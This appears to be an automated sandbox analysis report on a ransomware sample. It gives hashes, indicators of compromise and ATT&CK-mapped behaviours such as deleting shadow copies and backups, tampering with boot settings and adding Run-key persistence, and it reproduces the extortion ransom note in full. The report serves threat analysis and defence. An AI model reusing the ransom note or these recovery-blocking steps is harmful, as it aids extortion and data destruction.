951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
27-02-2024 17:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
Size

335KB
MD5

971e7aa8b0f947b99c9efaeff6ec6829
SHA1

8736231b49625d21d51e9def26234fd30ec94643
SHA256

951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa
SHA512

4c639ab003b32363bfb8a3d4d25db5bcab535f228267f9d50d80d4c18e8b304ce6266e486bb29f475b994356694dc84bbafc52e06bceeba768411026dd42f4cc
SSDEEP

6144:Ss39QEhvsfBm9LA8CwumYTyBR/APygP9cnPRpjbeVPDGsIFvrMqu:z9dSSA8CwumYTyBJAPyglgq1f2rMqu

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

\Device\HarddiskVolume1\Boot\da-DK\HOW_TO_BACK_FILES.html

Ransom Note

<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">{{IDENTIFIER}}</span> <br>  </div> </div>  <div class="tabs">  <div class="tab"> <div id="tab-content1" class="content"> <div class="text">  <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br>  <hr> <b>Contact us for price and get decryption software.</b><br><br> <a></a><br> <br><br> <br> <br> <br> <a><br> </a> <br> <hr> <b>If you can not use the above link, use the email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div>   </div> </div>  </div> </div> </body> </html> {{URL}}

Emails

href="[email protected]

">[email protected]

href="[email protected]

">[email protected]

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3056 created 1064	3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe	9

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2576	bcdedit.exe
2852	bcdedit.exe

Renames multiple (7546) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes System State backups 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2772	wbadmin.exe

Deletes system backups 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2348	wbadmin.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe\""	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe\""	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe

Enumerates connected drives 3 TTPs 26 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\U:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\Y:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\M:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\P:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\J:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\H:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\S:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\A:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\R:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\I:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\Q:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\V:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\Z:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\K:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\E:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\G:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\O:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\A:	cipher.exe
File opened (read-only)	\??\B:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\L:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\N:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\T:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\X:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened (read-only)	\??\F:	cipher.exe
File opened (read-only)	\??\F:	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ESEN\MSB1ESEN.ITS	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105384.WMF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152602.WMF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hr.txt	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\fr-FR\msadcfr.dll.mui	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy\splash.gif	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_snow.png	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter_partly-cloudy.png	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04117_.WMF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107728.WMF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PSSKETLG.WMF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Clarity.thmx	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\HOW_TO_BACK_FILES.html	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REPORTS.ICO	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LABELHM.POC	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File created	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\HOW_TO_BACK_FILES.html	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-middle.png	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-options-keymap.xml_hidden	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\HOW_TO_BACK_FILES.html	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AXIS\THMBNAIL.PNG	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\HOW_TO_BACK_FILES.html	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215718.WMF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR28F.GIF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\fr\HOW_TO_BACK_FILES.html	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_rest.png	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\14.png	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287024.WMF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\currency.js	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00403_.WMF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\header.gif	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsFormTemplate.html	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCOUPON.DPV	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\HAMMER.WAV	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_hover.png	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double.png	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right.gif	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ADD.GIF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\HOW_TO_BACK_FILES.html	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152704.WMF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\mscss7wre_en.dub	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\Priority.accft	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_dot.png	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_snow.png	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\localizedStrings.js	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106146.WMF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151063.WMF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_ON.GIF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\css\clock.css	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sl.txt	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Windows NT\Accessories\ja-JP\wordpad.exe.mui	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File created	C:\Program Files (x86)\Common Files\microsoft shared\Help\1028\HOW_TO_BACK_FILES.html	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01166_.WMF	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_over.png	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1992	3056	WerFault.exe	13

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
3048	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

pid	Process
2420	taskkill.exe
2196	taskkill.exe
1704	taskkill.exe
1576	taskkill.exe
2828	taskkill.exe
1128	taskkill.exe
2136	taskkill.exe
2412	taskkill.exe
1960	taskkill.exe
2328	taskkill.exe
1836	taskkill.exe
2540	taskkill.exe
2016	taskkill.exe
448	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe
3056	951facf3f3ef6f6163aa87383953132563d8ef1508b60cb130b1b7d5b96552aa.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

description	pid	Process
Token: SeDebugPrivilege	2540	taskkill.exe
Token: SeDebugPrivilege	2136	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	2412	taskkill.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	2328	taskkill.exe
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	1704	taskkill.exe
Token: SeDebugPrivilege	1836	taskkill.exe
Token: SeDebugPrivilege	448	taskkill.exe
Token: SeDebugPrivilege	2828	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2676	WMIC.exe
Token: SeSecurityPrivilege	2676	WMIC.exe
Token: SeTakeOwnershipPrivilege	2676	WMIC.exe
Token: SeLoadDriverPrivilege	2676	WMIC.exe
Token: SeSystemProfilePrivilege	2676	WMIC.exe
Token: SeSystemtimePrivilege	2676	WMIC.exe
Token: SeProfSingleProcessPrivilege	2676	WMIC.exe
Token: SeIncBasePriorityPrivilege	2676	WMIC.exe
Token: SeCreatePagefilePrivilege	2676	WMIC.exe
